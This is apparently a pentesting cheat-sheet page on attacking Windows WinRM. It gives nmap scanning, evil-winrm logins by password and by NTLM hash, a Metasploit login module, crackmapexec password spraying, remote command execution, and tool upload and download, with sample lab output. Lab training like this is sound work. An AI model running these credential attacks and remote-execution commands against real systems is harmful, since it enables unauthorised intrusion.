WinRM (5985, 5986)

Nmap

nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

Connect

evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!

evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"`

With docker

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'

Evil-WinRM

Metasploit

WinRMMetasploit Documentation Penetration Testing Software, Pen Testing Security

Metasploit

msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful:

Netexec - CME

NetExec - CME

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Command execution

[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB         10.129.202.136  445    WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.202.136  5985   WINSRV           [+] WINSRV\john:november (admin)
WINRM       10.129.202.136  5985   WINSRV           [+] Executed command (shell type: powershell)
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Directory: C:\
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Mode                LastWriteTime         Length Name
WINRM       10.129.202.136  5985   WINSRV           ----                -------------         ------ ----
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                PerfLogs
WINRM       10.129.202.136  5985   WINSRV           d-r---       12/14/2020   6:38 PM                Program Files
WINRM       10.129.202.136  5985   WINSRV           d-----        2/11/2022   6:10 AM                Program Files (x86)
WINRM       10.129.202.136  5985   WINSRV           d-r---         1/6/2022   6:49 AM                Users
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                Windows
WINRM       10.129.202.136  5985   WINSRV           
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #

Upload

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop

Download

.Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip

References

5985,5986 - Pentesting WinRMHackTricks

WinRM Penetration Testing - Hacking ArticlesHacking Articles

Lateral Movement – WinRMPenetration Testing Lab

PreviousSSH (22)NextWMI (135)

Last updated 3 months ago